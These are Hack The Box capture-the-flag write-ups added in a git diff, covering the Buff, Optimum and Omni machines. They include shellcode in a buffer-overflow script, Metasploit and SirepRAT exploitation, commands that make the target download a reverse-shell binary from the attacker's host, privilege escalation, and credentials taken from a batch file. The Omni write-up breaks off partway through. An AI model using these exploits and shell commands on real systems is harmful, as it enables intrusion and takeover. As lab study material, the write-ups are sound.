+ payload += b"\xba\xcc\x93\xd2\xd9\xdb\xc8\xd9\x74\x24\xf4\x58"
+ payload += b"\x2b\xc9\xb1\x52\x31\x50\x12\x03\x50\x12\x83\x0c"
+ payload += b"\x97\x30\x2c\x70\x70\x36\xcf\x88\x81\x57\x59\x6d"
+ payload += b"\xb0\x57\x3d\xe6\xe3\x67\x35\xaa\x0f\x03\x1b\x5e"
+ payload += b"\x9b\x61\xb4\x51\x2c\xcf\xe2\x5c\xad\x7c\xd6\xff"
+ payload += b"\x2d\x7f\x0b\xdf\x0c\xb0\x5e\x1e\x48\xad\x93\x72"
+ payload += b"\x01\xb9\x06\x62\x26\xf7\x9a\x09\x74\x19\x9b\xee"
+ payload += b"\xcd\x18\x8a\xa1\x46\x43\x0c\x40\x8a\xff\x05\x5a"
+ payload += b"\xcf\x3a\xdf\xd1\x3b\xb0\xde\x33\x72\x39\x4c\x7a"
+ payload += b"\xba\xc8\x8c\xbb\x7d\x33\xfb\xb5\x7d\xce\xfc\x02"
+ payload += b"\xff\x14\x88\x90\xa7\xdf\x2a\x7c\x59\x33\xac\xf7"
+ payload += b"\x55\xf8\xba\x5f\x7a\xff\x6f\xd4\x86\x74\x8e\x3a"
+ payload += b"\x0f\xce\xb5\x9e\x4b\x94\xd4\x87\x31\x7b\xe8\xd7"
+ payload += b"\x99\x24\x4c\x9c\x34\x30\xfd\xff\x50\xf5\xcc\xff"
+ payload += b"\xa0\x91\x47\x8c\x92\x3e\xfc\x1a\x9f\xb7\xda\xdd"
+ payload += b"\xe0\xed\x9b\x71\x1f\x0e\xdc\x58\xe4\x5a\x8c\xf2"
+ payload += b"\xcd\xe2\x47\x02\xf1\x36\xc7\x52\x5d\xe9\xa8\x02"
+ payload += b"\x1d\x59\x41\x48\x92\x86\x71\x73\x78\xaf\x18\x8e"
+ payload += b"\xeb\xda\xd6\x9e\xe6\xb2\xe4\x9e\xf9\xf9\x60\x78"
+ payload += b"\x93\xed\x24\xd3\x0c\x97\x6c\xaf\xad\x58\xbb\xca"
+ payload += b"\xee\xd3\x48\x2b\xa0\x13\x24\x3f\x55\xd4\x73\x1d"
+ payload += b"\xf0\xeb\xa9\x09\x9e\x7e\x36\xc9\xe9\x62\xe1\x9e"
+ payload += b"\xbe\x55\xf8\x4a\x53\xcf\x52\x68\xae\x89\x9d\x28"
+ payload += b"\x75\x6a\x23\xb1\xf8\xd6\x07\xa1\xc4\xd7\x03\x95"
+ payload += b"\x98\x81\xdd\x43\x5f\x78\xac\x3d\x09\xd7\x66\xa9"
+ payload += b"\xcc\x1b\xb9\xaf\xd0\x71\x4f\x4f\x60\x2c\x16\x70"
+ payload += b"\x4d\xb8\x9e\x09\xb3\x58\x60\xc0\x77\x68\x2b\x48"
+ payload += b"\xd1\xe1\xf2\x19\x63\x6c\x05\xf4\xa0\x89\x86\xfc"
+ payload += b"\x58\x6e\x96\x75\x5c\x2a\x10\x66\x2c\x23\xf5\x88"
+ payload += b"\x83\x44\xdc"
+
+ overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
+
+ buff = padding1 + EIP + NOPS + payload + overrun
+
+ try:
+ s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((target,8888))
+ s.send(buff)
+ except Exception as e:
+ print(sys.exc_value)
+
+
+
+So let's run it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/78 ] [~/HTB/Buff]
+ → python3 exploit.py
+
+
+
+And we catch the reverse shell connection:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/79 ] [~/HTB/Buff]
+ → nc -lvnp 443
+ listening on [any] 443 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.198] 50000
+ Microsoft Windows [Version 10.0.17134.1610]
+ (c) 2018 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>whoami
+ whoami
+ buff\administrator
+
+ C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
+ type C:\Users\Administrator\Desktop\root.txt
+ 4bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get a reverse shell as root and get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/5.md b/Easy/5.md
new file mode 100644
index 0000000..9764bb5
--- /dev/null
+++ b/Easy/5.md
@@ -0,0 +1,214 @@
+# Optimum Writeup
+
+
+
+## Introduction :
+
+Optimum was an easy Windows box released back in March 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ **λ nihilist [nihilist/_HTB/Optimum] → nmap -sC -sV 10.10.10.8**
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 14:48 CET
+ Nmap scan report for 10.10.10.8
+ Host is up (0.037s latency).
+ Not shown: 999 filtered ports
+ PORT STATE SERVICE VERSION
+ 80/tcp open http HttpFileServer httpd 2.3
+ |_http-server-header: HFS 2.3
+ |_http-title: HFS /
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 13.49 seconds
+
+
+Browsing to http://10.10.10.8/ gives us the main page of rejetto's HttpFileServer 2.3 service as planned.
+
+
+
+## **Part 2 : Getting User Access**
+
+Let's use the **nikto** command to enumerate potential vulnerabilities on the Http service.
+
+
+ **λ root [nihilist/_HTB/Optimum] → nikto -h http://10.10.10.8/**
+ - Nikto v2.1.6
+ ---------------------------------------------------------------------------
+ + Target IP: 10.10.10.8
+ + Target Hostname: 10.10.10.8
+ + Target Port: 80
+ + Start Time: 2019-11-10 15:02:06 (GMT1)
+ ---------------------------------------------------------------------------
+ + Server: HFS 2.3
+ + Cookie HFS_SID created without the httponly flag
+ + The anti-clickjacking X-Frame-Options header is not present.
+ + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ + No CGI Directories found (use '-C all' to force check all possible dirs)
+ + ERROR: Error limit (20) reached for host, giving up. Last error:
+ + Scan terminated: 0 error(s) and 4 item(s) reported on remote host
+ + End Time: 2019-11-10 15:02:50 (GMT1) (44 seconds)
+ ---------------------------------------------------------------------------
+ + 1 host(s) tested
+
+
+Let's use the **searchsploit** command to see which exploits are publicly available for rejetto's HttpFileServer service.
+
+
+ **λ root [nihilist/_HTB/Optimum] → searchsploit rejetto**
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit) | exploits/windows/remote/34926.rb
+ Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities | exploits/windows/remote/31056.py
+ Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | exploits/multiple/remote/30850.txt
+ Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | exploits/windows/remote/34668.txt
+ Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | exploits/windows/remote/39161.py
+ Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | exploits/windows/webapps/34852.txt
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+
+it seems that there are Remote Command Execution Vulnerabilities. We will use a metasploit module to exploit the target.
+
+
+ **msf5 > search rejetto**
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
+
+
+ **msf5 > use exploit/windows/http/rejetto_hfs_exec**
+
+ **msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOST 10.10.10.8**
+ RHOST => 10.10.10.8
+ **msf5 exploit(windows/http/rejetto_hfs_exec) > set RPORT 80**
+ RPORT => 80
+ **msf5 exploit(windows/http/rejetto_hfs_exec) > set SRVHOST 10.10.14.48**
+ SRVHOST => 10.10.14.48
+ **msf5 exploit(windows/http/rejetto_hfs_exec) > set SRVPORT 9001**
+ SRVPORT => 9001
+ **msf5 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.15.150**
+ LHOST => 10.10.15.150
+ **msf5 exploit(windows/http/rejetto_hfs_exec) > set LPORT 9002**
+ LPORT => 9002
+
+ **msf5 exploit(windows/http/rejetto_hfs_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcpset**
+
+ **msf5 exploit(windows/http/rejetto_hfs_exec) > exploit**
+
+ [*] Started reverse TCP handler on 10.10.14.48:9002
+ [*] Using URL: http://10.10.14.48:9001/7WzzcN0iSur
+ [*] Server started.
+ [*] Sending a malicious request to /
+ [*] Payload request received: /7WzzcN0iSur
+ [*] Sending stage (180291 bytes) to 10.10.10.8
+ [*] Meterpreter session 1 opened (10.10.14.48:9002 -> 10.10.10.8:49184) at 2019-11-10 15:27:23 +0100
+ [!] Tried to delete %TEMP%\XAzNIKQmr.vbs, unknown result
+ [*] Server stopped.
+
+ **meterpreter > sysinfo**
+ Computer : OPTIMUM
+ OS : Windows 2012 R2 (6.3 Build 9600).
+ Architecture : x64
+ System Language : el_GR
+ Domain : HTB
+ Logged On Users : 1
+ Meterpreter : x86/windows
+
+ **meterpreter > shell**
+ Process 1992 created.
+ Channel 2 created.
+ Microsoft Windows [Version 6.3.9600]
+ (c) 2013 Microsoft Corporation. All rights reserved.
+
+ **C:\Users\kostas\Desktop>whoami**
+ whoami
+ optimum\kostas
+
+
+
+Meterpreter Returned ! we are now logged on as kostas into a low-privilege shell.
+
+## **Part 3 : Getting Root Access**
+
+Now we need to use the exploit n°41020 taking advantage of RGNOBJ's Integer OVerflow on Windows 8.1 (MS16-098) We will download 41020.exe from exploit-db's collection of binary exploits available on github.
+
+_Terminal n°1:_
+
+
+ **wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe**
+
+ --2019-11-10 15:37:28-- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.118.3
+ Connecting to github.com (github.com)|140.82.118.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/41020.exe [following]
+ --2019-11-10 15:37:28-- https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/41020.exe
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.120.133
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.120.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 560128 (547K) [application/octet-stream]
+ Saving to: ‘41020.exe’
+
+ 41020.exe 100%[==============================================>] 547.00K 840KB/s in 0.7s
+
+ 2019-11-10 15:37:30 (840 KB/s) - ‘41020.exe’ saved [560128/560128]
+
+
+We downloaded the binary, now let's upload it to the server using metasploit, and execute it to attempt getting an elevated privilege shell.
+
+_Terminal n°2:_
+
+
+ **meterpreter > upload 41020.exe**
+ [*] uploading : 41020.exe -> 41020.exe
+ [*] Uploaded 547.00 KiB of 547.00 KiB (100.0%): 41020.exe -> 41020.exe
+ [*] uploaded : 41020.exe -> 41020.exe
+ meterpreter > shell
+ Process 900 created.
+ Channel 4 created.
+ Microsoft Windows [Version 6.3.9600]
+ (c) 2013 Microsoft Corporation. All rights reserved.
+
+ **C:\Users\kostas\Desktop>41020.exe**
+ 41020.exe
+ Microsoft Windows [Version 6.3.9600]
+ (c) 2013 Microsoft Corporation. All rights reserved.
+
+ **C:\Users\kostas\Desktop>whoami**
+ whoami
+ nt authority\system
+
+
+The privilege escalation was successful ! Now all that's left to do is collecting the user and root flags.
+
+
+ **C:\Users\kostas\Desktop>cd ..\..\..**
+
+ **C:\>more C:\Users\kostas\Desktop\user.txt.txt**
+ more C:\Users\kostas\Desktop\user.txt.txt
+ d0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ **C:\>more C:\Users\Administrator\Desktop\root.txt**
+ more C:\Users\Administrator\Desktop\root.txt
+ 51XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/50.md b/Easy/50.md
new file mode 100644
index 0000000..e8129a5
--- /dev/null
+++ b/Easy/50.md
@@ -0,0 +1,540 @@
+# Omni Writeup
+
+
+
+## Introduction :
+
+Omni is an Easy box released back in August 2020, it features a Windows IOT Core which can run on raspberry pis.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Omni]
+ → nmap -vvv -p- 10.10.10.204 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 8080/tcp on 10.10.10.204
+ Discovered open port 135/tcp on 10.10.10.204
+ Discovered open port 29817/tcp on 10.10.10.204
+ Discovered open port 29820/tcp on 10.10.10.204
+ Discovered open port 5985/tcp on 10.10.10.204
+ Discovered open port 29819/tcp on 10.10.10.204
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Omni]
+ → nmap -sCV -p 135,8008,5985,29817,29820,29819 10.10.10.204 -Pn
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-02 16:51 CEST
+ Nmap scan report for 10.10.10.204
+ Host is up (0.039s latency).
+
+ PORT STATE SERVICE VERSION
+ 135/tcp open msrpc Microsoft Windows RPC
+ 5985/tcp open upnp Microsoft IIS httpd
+ 8008/tcp filtered http
+ 29817/tcp open unknown
+ 29819/tcp open arcserve ARCserve Discovery
+ 29820/tcp open unknown
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port29820-TCP:V=7.91%I=7%D=6/2%Time=60B79B09%P=x86_64-pc-linux-gnu%r(NU
+ SF:LL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"\
+ SF:*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x04
+ SF:G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc
+ SF:9}\xc8O\x12");
+ Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 74.02 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 8080, so let's investigate it:
+
+
+
+We don't have credentials yet, so let's try to spawn a null session on the RPC port:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Omni]
+ → rpcclient -U "" -N 10.10.10.204
+ Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT
+
+
+
+No luck either, all that's left is the other 298XX ports, but we barely have any info on those. Although we know that this is windows from the port scanning, let's search what the ports may be about with what we know:
+
+
+
+And now we're onto something! This may be a Windows IOT machine, and the [presentation](https://woprsummit.org/slides-archive/SirepRAT_RCEasSYSTEMonWindowsIoTCore-WOPRSummit.pdf)that was presented in 2019 goes into how the Sirep protocol works, which also shows how it provides a remote unauthenticated execution of SYSTEM on windows IOT hosts.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [HTB/Omni/SirepRAT]
+ → python3 SirepRAT.py 10.10.10.204 GetSystemInformationFromDevice
+ <****SystemInformationResult | type: 51, payload length: 32, kv: {'dwOSVersionInfoSize': 0, 'dwMajorVersion': 10, 'dwMinorVersion': 0, 'dwBuildNumber': 17763, 'dwPlatformId': 2, 'szCSDVersion': 0, 'wServicePackMajor': 1, 'wServicePackMinor': 2, 'wSuiteMask': 0, 'wProductType': 0, 'wReserved': 0}>
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "\c dir -e powershell.exe" --v
+ ---------
+
+ ---------
+ ---------
+ Microsoft Windows [Version 10.0.17763.107]
+ Copyright (c) Microsoft Corporation. All rights reserved.
+
+ C:\windows\system32>
+ --------- <****HResultResult | type: 1, payload length: 4, HResult: 0x0> <****OutputStreamResult | type: 11, payload length: 125, payload peek: 'b'Microsoft Windows [Version 10.0.17763.107]\r\nCopyri''>
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "\c whoami -e powershell.exe" --v
+ ---------
+
+ ---------
+ ---------
+ Microsoft Windows [Version 10.0.17763.107]
+ Copyright (c) Microsoft Corporation. All rights reserved.
+
+ C:\windows\system32>
+ --------- <****HResultResult | type: 1, payload length: 4, HResult: 0x0> <****OutputStreamResult | type: 11, payload length: 125, payload peek: 'b'Microsoft Windows [Version 10.0.17763.107]\r\nCopyri''>
+
+Very weird box, we can't even use the whoami command, but let's try to get nc.exe onto the box, we're going to get [xc.exe](../Tools/xc.html) instead:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [HTB/Omni/SirepRAT]
+ → locate xc.exe
+ /home/nothing/HTB/Servmon/xc/xc.exe
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [HTB/Omni/SirepRAT]
+ → cp /home/nothing/HTB/Servmon/xc/xc.exe .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [HTB/Omni/SirepRAT]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+Then we make the box download it using SirepRAT.py:
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → cp /home/nothing/HTB/Servmon/xc/xc .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → ./xc -l -p 9009
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/06/02 17:31:18 Listening on :9009
+ 2021/06/02 17:31:18 Waiting for connections...
+
+
+ [term2]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [HTB/Omni/SirepRAT]
+ → locate xc.exe
+ /home/nothing/HTB/Servmon/xc/xc.exe
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [HTB/Omni/SirepRAT]
+ → cp /home/nothing/HTB/Servmon/xc/xc.exe .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [HTB/Omni/SirepRAT]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+ [term3]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/75 ] [HTB/Omni/SirepRAT]
+ → python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\xc.exe -Uri http://10.10.14.13:9090/xc.exe" --v
+ ---------
+
+ --------- <****HResultResult | type: 1, payload length: 4, HResult: 0x0>
+
+Now that the xc.exe binary got downloaded by the box, we're going to use it to get the reverse shell:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/75 ] [HTB/Omni/SirepRAT]
+ → python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\xc.exe 10.10.14.13 9009 -e powershell.exe" --v
+ ---------
+
+ ---------
+ ---------
+ 2021/06/02 15:42:11 Connected to 10.10.14.13:9009
+
+ ---------
+ <****HResultResult | type: 1, payload length: 4, HResult: 0x0> <****OutputStreamResult | type: 11, payload length: 50, payload peek: 'b'2021/06/02 15:42:11 Connected to 10.10.14.13:9009\n''>
+
+And we catched the reverse xc shell connection:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → ./xc -l -p 9009
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/06/02 17:31:18 Listening on :9009
+ 2021/06/02 17:31:18 Waiting for connections...
+ 2021/06/02 17:34:39 Connection from 10.10.10.204:49670
+ 2021/06/02 17:34:39 Stream established
+
+ [*] Auto-Plugins:
+ [xc: C:\windows\system32]: !shell
+ Microsoft Windows [Version 10.0.17763.107]
+ Copyright (c) Microsoft Corporation. All rights reserved.
+
+ C:\windows\system32>whoami
+ whoami
+ 'whoami' is not recognized as an internal or external command,
+ operable program or batch file.
+
+Here you see we really cannot use the whoami command, instead we're going to get the value of the **$env:UserName** powershell variable:
+
+
+ C:\windows\system32>powershell
+ powershell
+ Windows PowerShell
+ Copyright (C) Microsoft Corporation. All rights reserved.
+
+
+ PS C:\windows\system32> $env:UserName
+ $env:UserName
+ omni$
+
+
+
+the omni user does not have access to neither user.txt nor to root.txt, so let's enumerate the box for potential privesc paths with winPEAS:
+
+
+ PS C:\windows\system32> cd C:\
+ cd C:\
+ PS C:\> dir
+ dir
+
+
+ Directory: C:\
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 7/20/2020 2:36 AM $Reconfig$
+ d----l 10/26/2018 11:35 PM Data
+ d----- 10/26/2018 11:37 PM Program Files
+ d----- 10/26/2018 11:38 PM PROGRAMS
+ d----- 10/26/2018 11:37 PM SystemData
+ d-r--- 10/26/2018 11:37 PM Users
+ d----- 7/3/2020 10:35 PM Windows
+
+
+ PS C:\> mkdir Temp
+ mkdir Temp
+
+
+ Directory: C:\
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 6/2/2021 3:45 PM Temp
+
+
+ PS C:\> cd Temp
+ cd Temp
+ PS C:\Temp>
+
+
+We're going to upload our script in a temporary directory we created:
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/75 ] [HTB/Omni/SirepRAT]
+ → locate winPEAS.ps1
+ /usr/share/powershell-empire/data/module_source/privesc/Invoke-winPEAS.ps1
+
+ [ 10.10.14.13/23 ] [ /dev/pts/75 ] [HTB/Omni/SirepRAT]
+ → cp $(locate winPEAS.ps1) .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/75 ] [HTB/Omni/SirepRAT]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [term2]
+
+ PS C:\Temp> Invoke-WebRequest -uri "http://10.10.14.13:9090/Invoke-winPEAS.ps1" -o "peas.ps1"
+ Invoke-WebRequest -uri "http://10.10.14.13:9090/Invoke-winPEAS.ps1" -o "peas.ps1"
+
+ PS C:\Temp> ls
+ ls
+
+
+ Directory: C:\Temp
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 6/2/2021 3:56 PM 233056 peas.ps1
+
+ PS C:\Temp> import-module ./peas.ps1
+ import-module ./peas.ps1
+
+ PS C:\Temp> Invoke-winPEAS
+
+ PS C:\Temp> import-module .\peas.ps1
+ import-module .\peas.ps1
+
+ PS C:\Temp> Invoke-winPEAS
+ Invoke-winPEAS
+ Unable to find type [w1nP34S.Program].
+ At C:\Temp\peas.ps1:20 char:5
+ + [w1nP34S.Program]::Main($Command.Split(" "))
+ + ~~~~~~~~~~~~~~~~~
+ + CategoryInfo : InvalidOperation: (w1nP34S.Program:TypeName) [],
+ RuntimeException
+ + FullyQualifiedErrorId : TypeNotFound
+
+
+
+Yeah right, that box is quite a mess so let's manually enumerate:
+
+
+ PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> ls
+ ls
+
+
+ Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 10/26/2018 11:37 PM 1.0.0.1
+
+
+
+ PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> ls -force
+ ls -force
+
+
+ Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 10/26/2018 11:37 PM 1.0.0.1
+ -a-h-- 8/21/2020 12:56 PM 247 r.bat
+
+
+
+ PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> cat r.bat
+ cat r.bat
+ @echo off
+
+ :LOOP
+
+ for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete
+
+ net user app mesh5143
+ net user administrator _1nt3rn37ofTh1nGz
+
+ ping -n 3 127.0.0.1
+
+ cls
+
+ GOTO :LOOP
+
+ :EXIT
+
+
+
+And here we find credentials **app:mesh5143** and **administrator:_int3rn37ofTh1nGz** , Let's first get the app user's flag:
+
+
+
+once logged in we are greeted by the Windows Device Portal, however we're interested in the command prompt:
+
+
+
+And we're going to run our xc.exe binary once again, but this time as the app user:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → ./xc -l -p 9008
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/06/02 18:20:13 Listening on :9008
+ 2021/06/02 18:20:13 Waiting for connections...
+
+` 
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → ./xc -l -p 9008
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/06/02 18:21:50 Listening on :9008
+ 2021/06/02 18:21:50 Waiting for connections...
+ 2021/06/02 18:21:54 Connection from 10.10.10.204:49676
+ 2021/06/02 18:21:54 Stream established
+
+ [*] Auto-Plugins:
+ [xc: C:\windows\system32]: !shell
+ Microsoft Windows [Version 10.0.17763.107]
+ Copyright (c) Microsoft Corporation. All rights reserved.
+
+ C:\windows\system32>powershell
+ powershell
+ Windows PowerShell
+ Copyright (C) Microsoft Corporation. All rights reserved.
+
+ PS C:\windows\system32> cd C:\
+ cd C:\
+ PS C:\> cd Data
+ cd Data
+ PS C:\Data> cd Users
+ cd Users
+ PS C:\Data\Users> cd app
+ cd app
+ PS C:\Data\Users\app> ls
+ ls
+
+
+ Directory: C:\Data\Users\app
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d-r--- 7/4/2020 7:28 PM 3D Objects
+ d-r--- 7/4/2020 7:28 PM Documents
+ d-r--- 7/4/2020 7:28 PM Downloads
+ d----- 7/4/2020 7:28 PM Favorites
+ d-r--- 7/4/2020 7:28 PM Music
+ d-r--- 7/4/2020 7:28 PM Pictures
+ d-r--- 7/4/2020 7:28 PM Videos
+ -ar--- 7/4/2020 8:20 PM 344 hardening.txt
+ -ar--- 7/4/2020 8:14 PM 1858 iot-admin.xml
+ -ar--- 7/4/2020 9:53 PM 1958 user.txt
+
+
+ PS C:\Data\Users\app> cat user.txt
+ cat user.txt <****Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <****Obj RefId="0"> <****TN RefId="0"> <****T>System.Management.Automation.PSCredential <****/T> <****T>System.Object <****/T> <****/TN> <****ToString>System.Management.Automation.PSCredential <****/ToString>** rops>
+ <****S N="UserName">flag <****/S> <****SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7 <****/SS> <****/Props> <****/Obj> <****/Objs>
+
+The user flag seems to be encrypted, but we can use **Import-CliXml** to decrypt it:
+
+
+ PS C:\Data\Users\app> (Import-CliXml -Path user.txt).GetNetworkCredential().Password
+ (Import-CliXml -Path user.txt).GetNetworkCredential().Password
+ 7cfd50f6bc34db3204898f1505ad9d70
+ 7cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it ! we got the user flag!
+
+## **Part 3 : Getting Root Access**
+
+We're going to repeat the same process with the administrator credentials:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/76 ] [HTB/Omni/SirepRAT]
+ → ./xc -l -p 9007
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/06/02 18:37:14 Listening on :9007
